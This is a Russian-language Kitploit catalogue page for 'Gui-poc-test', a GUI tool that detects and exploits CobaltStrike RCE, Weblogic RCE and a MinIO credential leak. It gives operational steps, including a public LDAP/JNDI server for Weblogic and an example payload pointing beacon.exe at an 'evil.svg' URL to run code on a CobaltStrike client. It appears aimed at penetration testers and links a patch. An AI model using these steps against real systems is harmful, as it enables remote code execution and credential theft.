Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Gui-poc-test — Инструмент для тестирования CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 | Kitploit
Инструменты/GitHubGitHub/romanc9/gui-poc-test
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubromanc9/gui-poc-test

Gui-poc-test

Инструмент для тестирования CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

Репозиторий
222 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Gui-poc-test

A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

Графический инструмент для обнаружения и эксплуатации этих трех уязвимостей

Примечания

  1. Для запуска jar требуется Java 8

  2. Предназначен для одной цели, не подходит для массового сканирования IP

  3. При сборке для эксплуатации уязвимости Weblogic необходимо указать wlfullclient.jar, его нужно добавить самостоятельно

Usage

java -jar Gui-poc-test.jar

Способ использования: есть две кнопки — «Обнаружение» и «Эксплуатация». Для разных уязвимостей инструмент подсказывает способ использования в интерфейсе.

MinIO утечка информации:

Введите цель, порт указывать не обязательно, по умолчанию 9000, можно изменить (см. исходный код GuiDemo.java:line144)

Отображаются MINIO_ROOT_USER, MINIO_ROOT_PASSWORD и др.

image

Weblogic RCE

Введите IP цели, порт, адрес LDAP-сервера

Обнаружение:

image

Примечание: для эксплуатации уязвимости необходимо самостоятельно развернуть LDAP-сервер (публичный)

  • Инструмент для использования jndi-сервера: используйте утилиту JNDIExploit.jar для запуска LDAP и WEB-сервисов, см. https://github.com/WhiteHSBG/JNDIExploit
image

CobaltStrike RCE

  1. После выбора уязвимости по умолчанию отображается метод самостоятельной проверки: введите тестовый код в слушателе CS, чтобы проверить, существует ли уязвимость.
  2. Предварительное условие эксплуатации: локально уже получен троян (exe) цели.
  3. Требования к среде выполнения: win, python3, установите frida-tools через pip3.
  4. Python должен быть добавлен в переменные окружения.
  5. Самостоятельно разверните сервер для размещения SVG-файлов и JAR-пакета, чтобы цель имела к ним доступ.
  6. Введите абсолютный путь к exe и адрес SVG через пробел, нажмите «Выполнить» для контрудара.
  7. Содержимое JAR-пакета настраивается самостоятельно; в демонстрации он открывает калькулятор.
  8. По умолчанию имя трояна — beacon, его можно изменить (см. исходный код cve_2022_39197.py:line28)

Пример полезной нагрузки: beacon.exe http://127.0.0.1:4444/evil.svg

Результат: на Win запускается троян, на Mac CS-клиент подключается

Одновременно на стороне CS выполняется содержимое JAR-пакета, открывается калькулятор

image

На Win фиксируется адрес посещения CS

image

Reference

Принцип: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md

https://github.com/4ra1n/CVE-2023-21839

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

https://github.com/its-arun/CVE-2022-39197

Патч для CS: https://github.com/burpheart/CVE-2022-39197-patch

Скачать инструмент